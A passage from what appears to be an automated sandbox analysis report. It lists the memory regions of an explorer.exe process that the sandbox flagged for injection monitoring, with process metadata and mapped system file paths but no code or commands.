ThreadHandle=0x18fe30*=0x90, ClientId=0x0) returned 0x0 [0095.524] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x8651000" os_pid = "0x390" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 377 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 378 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 379 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 380 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 381 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 382 start_va = 0xc0000 end_va = 0xc5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 383 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 384 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 385 start_va = 0xf0000 end_va = 0xfcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 386 start_va = 0x100000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 387 start_va = 0x110000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 388 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 389 start_va = 0x290000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 390 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 391 start_va = 0x2e0000 end_va = 0x3befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 392 start_va = 0x3c0000 end_va = 0x3c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 393 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 394 start_va = 0x3e0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 395 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 396 start_va = 0x670000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 397 start_va = 0x800000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 398 start_va = 0x1c00000 end_va = 0x1c01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 399 start_va = 0x1c10000 end_va = 0x1c29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 400 start_va = 0x1c30000 end_va = 0x1c30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 401 start_va = 0x1c40000 end_va = 0x1c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 402 start_va = 0x1c50000 end_va = 0x1c61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 403 start_va = 0x1c70000 end_va = 0x1c72fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 404 start_va = 0x1c80000 end_va = 0x1c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 405 start_va = 0x1c90000 end_va = 0x1c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 406 start_va = 0x1ca0000 end_va = 0x1ca1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 407 start_va = 0x1cb0000 end_va = 0x1cb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cb0000" filename = "" Region: id = 408 start_va = 0x1cc0000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 409 start_va = 0x1d40000 end_va = 0x1d41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 410 start_va = 0x1d50000 end_va = 0x1d52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui") Region: id = 411 start_va = 0x1d60000 end_va = 0x1d60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 412 start_va = 0x1d70000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 413 start_va = 0x1df0000 end_va = 0x20befff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 414 start_va = 0x20c0000 end_va = 0x211bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 415 start_va = 0x2120000 end_va = 0x2125fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 416 start_va = 0x2130000 end_va = 0x2130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 417 start_va = 0x2140000 end_va = 0x2148fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 418 start_va = 0x2150000 end_va = 0x2153fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 419 start_va = 0x2160000 end_va = 0x2176fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 420 start_va = 0x2180000 end_va = 0x2180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002180000" filename = "" Region: id = 421 start_va = 0x2190000 end_va = 0x2193fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 422 start_va = 0x21a0000 end_va = 0x21a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 423 start_va = 0x21b0000 end_va = 0x21b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 424 start_va = 0x21c0000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 425 start_va = 0x2220000 end_va = 0x229dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 426 start_va = 0x22a0000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 427 start_va = 0x23a0000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 428 start_va = 0x23d0000 end_va = 0x23d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 429 start_va = 0x23e0000 end_va = 0x23e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 430 start_va = 0x23f0000 end_va = 0x23f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 431 start_va = 0x2400000 end_va = 0x2400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002400000" filename = "" Region: id = 432 start_va = 0x2410000 end_va = 0x2410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002410000" filename = "" Region: id = 433 start_va = 0x2420000 end_va = 0x2421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002420000" filename = "" Region: id = 434 start_va = 0x2430000 end_va = 0x2430fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 435 start_va = 0x2440000 end_va = 0x2440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 436 start_va = 0x2450000 end_va = 0x2450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 437 start_va = 0x2460000 end_va = 0x2460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 438 start_va = 0x2470000 end_va = 0x247efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 439 start_va = 0x2480000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 440 start_va = 0x2580000 end_va = 0x267ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 441 start_va = 0x2680000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 442 start_va = 0x2780000 end_va = 0x2781fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002780000" filename = "" Region: id = 443 start_va = 0x2790000 end_va = 0x2791fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 444 start_va = 0x27a0000 end_va = 0x27a4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 445 start_va = 0x27b0000 end_va = 0x27b7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012022011120220112\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012022011120220112\\index.dat") Region: id = 446 start_va = 0x27c0000 end_va = 0x27c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 447 start_va = 0x27d0000 end_va = 0x284ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 448 start_va = 0x2850000 end_va = 0x2850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 449 start_va = 0x2860000 end_va = 0x2860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 450 start_va = 0x2870000 end_va = 0x2870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 451 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 452 start_va = 0x2890000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 453 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 454 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 455 start_va = 0x29a0000 end_va = 0x29a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 456 start_va = 0x29b0000 end_va = 0x29b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029b0000" filename = "" Region: id = 457 start_va = 0x29c0000 end_va = 0x29c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029c0000" filename = "" Region: id = 458 start_va = 0x29d0000 end_va = 0x29d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "authui.dll.mui" filename = "\\Windows\\System32\\en-US\\authui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\authui.dll.mui") Region: id = 459 start_va = 0x29e0000 end_va = 0x29edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 460 start_va = 0x29f0000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 461 start_va = 0x2a70000 end_va = 0x2ad5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 462 start_va = 0x2ae0000 end_va = 0x2ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 463 start_va = 0x2af0000 end_va = 0x2b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 464 start_va = 0x2b70000 end_va = 0x2b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 465 start_va = 0x2b80000 end_va = 0x2b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b80000" filename = "" Region: id = 466 start_va = 0x2b90000 end_va = 0x2b93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 467 start_va = 0x2ba0000 end_va = 0x2ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 468 start_va = 0x2bb0000 end_va = 0x2bb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 469 start_va = 0x2bc0000 end_va = 0x2bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bc0000" filename = "" Region: id = 470 start_va = 0x2bd0000 end_va = 0x2bd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bd0000" filename = "" Region: id = 471 start_va = 0x2be0000 end_va = 0x2be3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 472 start_va = 0x2bf0000 end_va = 0x2bf0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 473 start_va = 0x2c00000 end_va = 0x2c03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 474 start_va = 0x2c10000 end_va = 0x2c10fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{228385D3-B646-481B-B0DE-F0C3A58F5423}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db") Region: id = 475 start_va = 0x2c20000 end_va = 0x2c23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 476 start_va = 0x2c30000 end_va = 0x2c30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{87178F01-581A-45F0-9991-3F918FAA83F1}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db") Region: id = 477 start_va = 0x2c40000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 478 start_va = 0x2cc0000 end_va = 0x35effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 479 start_va = 0x35f0000 end_va = 0x35f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 480 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{C353F91E-D25F-48F0-A2CD-9F60B2681E9A}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db") Region: id = 481 start_va = 0x3610000 end_va = 0x3613fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 482 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{2F368D22-02BF-4413-97D1-C886CB140911}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db") Region: id = 483 start_va = 0x3630000 end_va = 0x36affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 484 start_va = 0x36b0000 end_va = 0x36b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 485 start_va = 0x36c0000 end_va = 0x36c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 486 start_va = 0x36d0000 end_va = 0x36d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 487 start_va = 0x36e0000 end_va = 0x36e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036e0000" filename = "" Region: id = 488 start_va = 0x36f0000 end_va = 0x36f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 489 start_va = 0x3700000 end_va = 0x3700fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 490 start_va = 0x3710000 end_va = 0x3714fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 491 start_va = 0x3720000 end_va = 0x379ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 492 start_va = 0x37a0000 end_va = 0x37e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 493 start_va = 0x37f0000 end_va = 0x37f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037f0000" filename = "" Region: id = 494 start_va = 0x3800000 end_va = 0x3800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 495 start_va = 0x3810000 end_va = 0x3810fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 496 start_va = 0x3820000 end_va = 0x3821fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003820000" filename = "" Region: id = 497 start_va = 0x3830000 end_va = 0x38affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003830000" filename = "" Region: id = 498 start_va = 0x38b0000 end_va = 0x38e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038b0000" filename = "" Region: id = 499 start_va = 0x38f0000 end_va = 0x38f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038f0000" filename = "" Region: id = 500 start_va = 0x3900000 end_va = 0x3900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 501 start_va = 0x3910000 end_va = 0x3911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003910000" filename = "" Region: id = 502 start_va = 0x3920000 end_va = 0x3921fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003920000" filename = "" Region: id = 503 start_va = 0x3930000 end_va = 0x3930fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003930000" filename = "" Region: id = 504 start_va = 0x3940000 end_va = 0x3940fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003940000" filename = "" Region: id = 505 start_va = 0x3960000 end_va = 0x3973fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 506 start_va = 0x3980000 end_va = 0x3980fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alttab.dll.mui" filename = "\\Windows\\System32\\en-US\\AltTab.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\alttab.dll.mui") Region: id = 507 start_va = 0x3990000 end_va = 0x3994fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 508 start_va = 0x39a0000 end_va = 0x39a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039a0000" filename = "" Region: id = 509 start_va = 0x39b0000 end_va = 0x39b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039b0000" filename = "" Region: id = 510 start_va = 0x39c0000 end_va = 0x3a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039c0000" filename = "" Region: id = 511 start_va = 0x3a40000 end_va = 0x3a40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 512 start_va = 0x3a50000 end_va = 0x3acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 513 start_va = 0x3ad0000 end_va = 0x3ad1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ad0000" filename = "" Region: id = 514 start_va = 0x3ae0000 end_va = 0x3ae6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 515 start_va = 0x3af0000 